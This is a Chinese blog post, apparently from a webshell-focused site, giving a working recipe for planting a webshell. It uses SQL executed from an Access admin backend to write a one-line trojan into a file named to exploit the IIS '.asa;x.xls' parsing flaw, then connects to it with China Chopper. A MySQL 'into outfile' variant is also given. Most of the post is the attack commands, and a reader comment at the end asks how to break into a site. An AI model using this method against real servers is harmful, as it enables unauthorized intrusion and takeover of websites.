ACCESS执行SQL语句导出一句话拿webshell

分类:安全 | 2012-10-12 | 撸过 142 次
1人扯谈

实用环境,在access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

逐一执行以下语句就可以导出一句话了
第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('一句话木马')

 
第三句代码

select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd 

 
 
第四句代码

drop table cmd 

直接菜刀里连接https://www.webshell.cc/1.asa;x.xls

 

 

SQL语句意思解释:
第一句
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句
在表cmd的a字段插入一句话木马
第三句
把cmd表a的内容导出到路径e:\web\webshellcc\的EXCEL文件
第四句
删除建立的cmd表
 
以下内容为测试:
Access利用后台SQL执行命令功能导出WebShell:
这个更简单:

Select 'asp一句话木马' into [vote] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 8.0;' from vote 

或者

Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; 

后台有执行SQL语句功能(vote为已知表段)

本站内容均为原创,转载请务必保留署名与链接!
ACCESS执行SQL语句导出一句话拿webshell:https://www.webshell.cc/4074.html

随机日志

  1. 弱弱的问下 如果服务器禁止了access数据库的下载 应该如何破解网站。比如aspcsm的开源投票系统。有漏洞么?》